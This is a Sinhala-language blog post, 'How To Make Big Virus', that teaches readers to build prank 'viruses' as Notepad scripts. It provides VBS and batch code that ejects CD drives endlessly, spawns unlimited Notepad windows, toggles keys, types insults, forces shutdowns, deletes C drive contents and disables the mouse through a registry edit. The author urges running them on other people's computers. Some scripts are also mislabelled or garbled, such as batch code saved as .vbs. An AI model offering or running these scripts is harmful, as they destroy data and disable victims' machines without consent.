UA-68682341-2

How To Make Big Virus

               හම්මේ මෙන්න පට්ට ආතල් virus රොත්තක්ම     හදාගන්න හැටි ....! 

 

ඔන්න යාලුවනේ වෛරස් හදාගන්න ආස අයට වෛරස් රොත්තක්ම හදන හැටි කියල දෙන්න හිතුව....මේක ටිකක් ලේසි වැඩක්....හැබැයි මෙව්ව ආතල් වෛරස්.....ඔයාගෙ කොමටනං අවුලක් වෙන්නෑ...හැබැයි දන්නැතුව මේ වෛරස් වෙන කෙනෙක් රන් කලොත් එයා ටිකක් බයවෙයි ඈ....කරලම බලන්නකෝ....මේකට අපි භාවිතා කරන්නෙ Note pad එකම තමයි ඈ...කරන හැටි බලමුකො එහෙනම්.....



(1)Continually Pop Out CD/DVD Drive

මේ වෛරස් එකේ නමින්ම සමහර අයට තේරෙන්න ඇතිනේ...මේකෙන් වෙන්නෙ  ඔයාගෙ CD/DVD රොම් එක ඇරෙනව වැහෙනව....එක දිගටම...කොච්චර වැහුවත් ආයෙ අ‍ැරෙනව...ආයෙ වැහෙනව....මේක හදන්නෙ මෙහෙමයි ඈ...

*මුලින්ම ඩෙස්ක්ටොප් එකේ කොහේ හරි රයිග්ට් ක්ලික් කරල Note pad එකක් ඕපන් කරගෙන මේ පහළ කෝඩ් එක කොපි කරන් ඒ නෝට් පෑඩ් එකට පේස්ට් කරගන්නකෝ.....

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 1000
loop
*ඊටපස්සෙ නෝට් පෑඩ් එකේ උඩ file ක්ලික් කරල save as වලට ගිහිං save as type  කියන තැනට All files තෝරල දීල...file name එකට Cjz.vbs කියල සේව් කරගන්නකෝ....(cjz වෙනුවට ඔයාට කැමති නමක් දෙන්න පුලුවන් ඈ)

*ඒ වෛරස් එක නවත්වන්නෙ Ctrl+Alt+Delete බට්න් ප්‍රෙස් කරල ටාස්ක් මැනේජර් අරන් එතන පෙන්නන wscript.exe කියන එක තෝරල End process දීල...හරිනේ....


(2)100 Notepads open

මේ වෛරස් එක ගැනත් ඔයාලට සමහර විට තේරෙන්න ඇති....මේ වෛරස් එකෙන් වෙන්නෙ ඔයා මේ වෛරස් එක රන් කරපු ගමන් නෝට් පෑඩ් 100ක් විතර ටිං ටිං ගාල ඕපන් වෙන්න ගන්නව....ස්ලෝව් කම්පියුටර් එකකින් කර‍ොත්නම් අනිව මැෂින් එක ස්ටක් වෙයි.....රීස්ටාර්ට් කරන්නත් වෙයි ඈ එතකොට.....මේක කරන්නෙත් කලින් එක වගේමයි ඈ...

*
මුලින්ම ඩෙස්ක්ටොප් එකේ කොහේ හරි රයිග්ට් ක්ලික් කරල Note pad එකක් ඕපන් කරගෙන මේ පහළ කෝඩ් එක කොපි කරන් ඒ නෝට් පෑඩ් එකට පේස්ට් කරගන්නකෝ.....
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
*ඊටපස්සෙ නෝට් පෑඩ් එකේ උඩ file ක්ලික් කරල save as වලට ගිහිං save as type  කියන තැනට All files තෝරල දීල...file name එකට Cjz2.vbs කියල සේව් කරගන්නකෝ.....(cjz2 වෙනුවට ඔයාට කැමති නමක් දෙන්න පුලුවන් ඈ)

*ඒ වෛරස් එක නවත්වන්නෙ Ctrl+Alt+Delete බට්න් ප්‍රෙස් කරල ටාස්ක් මැනේජර් අරන් එතන පෙන්නන wscript.exe කියන එක තෝරල End process දීල...හරිනේ....කලින් වගේමයි....

(3.)
CapsLock Blink
මේකෙන් වෙනදේත් සමහරවිට හිතාගන්න පුලුවන් ඇතිනේ ඔයාලට...මේකෙන් වෙන්නෙ Caps Lock බට්න් එක එකදිගටම ක්ලික් වෙන්න ගන්න එක....ඒකත් කරන්නෙ අරවිදියටමයි ඈ....මෙන්න කෝඩ් එක....
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
*ඊටපස්සෙ නෝට් පෑඩ් එකේ උඩ file ක්ලික් කරල save as වලට ගිහිං save as type  කියන තැනට All files තෝරල දීල...file name එකට Cjz4.vbs කියල සේව් කරගන්නකෝ...
.(cjz4වෙනුවට ඔයාට කැමති නමක් දෙන්න පුලුවන් ඈ)
*කලින් වගේමයි ඈ....අයින් කරන්නෙත්....


(4.)
You are fool

මේකෙන් වෙන්නෙ එක දිගට Num lock බට්න් එක ප්‍රෙස් වෙන ගමන්....නෝට් පෑඩ් එකක් ඕපන්වෙලා you are fool....කියල එකදිගටම වැටෙනව....නවත්තන්නම බෑ.....මේකත් කලින්වගේමයි හදන්නෙ ඈ....මෙන්න කෝඩ් එක....
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop
*ඊටපස්සෙ නෝට් පෑඩ් එකේ උඩ file ක්ලික් කරල save as වලට ගිහිං save as type  කියන තැනට All files තෝරල දීල...file name එකට Cjz3.vbs කියල සේව් කරගන්නකෝ...
.(cjz3 වෙනුවට ඔයාට කැමති නමක් දෙන්න පුලුවන් ඈ)
*කලින් වගේමයි ඈ....අයින් කරන්නෙත්....


(5)Delete C Drive Content

*මේකනම් බයානකයි ඈ....ඔයාගෙ මැෂින් එකේනම් රන් කරන්නෙපා....මංනං වගකියන්නෑ ඔන්න ඈ....මෙන්න කෝඩ් එක
@Echo off
Del C:\ *.* |y
*ඊටපස්සෙ නෝට් පෑඩ් එකේ උඩ file ක්ලික් කරල save as වලට ගිහිං save as type  කියන තැනට All files තෝරල දීල...file name එකට Cjz5.vbs කියල සේව් කරගන්නකෝ...
.(cjz5 වෙනුවට ඔයාට කැමති නමක් දෙන්න පුලුවන් ඈ)

*මේක ඔයාගෙ මැෂින් එක‍ේ රන් කරල බලන්නකෝ....

(6)SHUT DOW COMPUTER AT YOUR COMMAND

මේකෙන් වෙන්නෙ සීඑම්ඩී එකෙන් ඔයාට බැනල කම්පියුටරේ බලෙන් ඕෆ් කරන එක....මේකෙන් අමුතු ලල් එකක් තියේ ඈ...මෙන්න කෝඩ් එක...
wx@echo off
msg * I Hate You Dude!
shutdown -c Error! Coz You are An Idiot! -s

*ඊටපස්සෙ නෝට් පෑඩ් එකේ උඩ file ක්ලික් කරල save as වලට ගිහිං save as type  කියන තැනට All files තෝරල දීල...file name එකට Cjz6.vbs කියල සේව් කරගන්නකෝ...
.(cjz6 වෙනුවට ඔයාට කැමති නමක් දෙන්න පුලුවන් ඈ)
7.Desable Mouse
මේකෙන් වෙන්නෙ ඔයාගෙ මවුස් එක ඩිසේබ්ල් වෙන එක...වැඩ නැතුව යනව ඈ....ඕනනම් මේකත් කරල බලන්නකො ආතල් එකටත් එක්ක..නෝට්පෑඩ් එකට මෙන්න කෝඩ් එක.....

rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------
:*ඊටපස්සෙ නෝට් පෑඩ් එකේ උඩ file ක්ලික් කරල save as වලට ගිහිං save as type  කියන තැනට All files තෝරල දීල...file name එකට Cjz7.vbs කියල සේව් කරගන්නකෝ...
.(cjz7 වෙනුවට ඔයාට කැමති නමක් දෙන්න පුලුවන් ඈ)

*නවත්තන්නෙ කලින් වගේ ටාස්ක් මැනේජර් වලින් ඈ...



හරිනේ එහෙනම්...කරල බලන්න ඈ....‍ඔයාගෙ කොමේ නැතුව වෙන කෙනෙක්ගෙ කොමක කරනවනං ගොඩාරියක් හොඳයි ඈ....හැබැයි ඒ අයට ගොඩාරියක් රිදෙයි ඈ....අර සමහර එව්වට මංනං වගකියන්නෑඈ....එහෙනම් මං ගියා...කමෙන්ට් එකක් දාන්න අමතක කරන්නෙපා ඈ... බායි...

අමතක වුනානේ ඔයාලට 
කොපි කරන්න බෑනේ සොරි මේ කාලේ ලිපි හොරු ඉන්නවා
Share on Google Plus

About Unknown

ඔයාලා මේක කියෙව්වට සතුතියි මම ඔයාලට ඉස්සරහටත් මේ වගේ රසවත් ලිපි දෙන්න බලාපොරොත්තු වෙනවා ගැටලුවක් ඇති උනොත් මේකෙන් හරි බුකියෙන් හරි "Comment" කරන්න මම සියළුමසොෆ්ට්.
    Blogger Comment
    Facebook Comment

0 comments:

Post a Comment

Translate

Your Computer Deatails

Addsense

Ads By Google

UA-68682341-2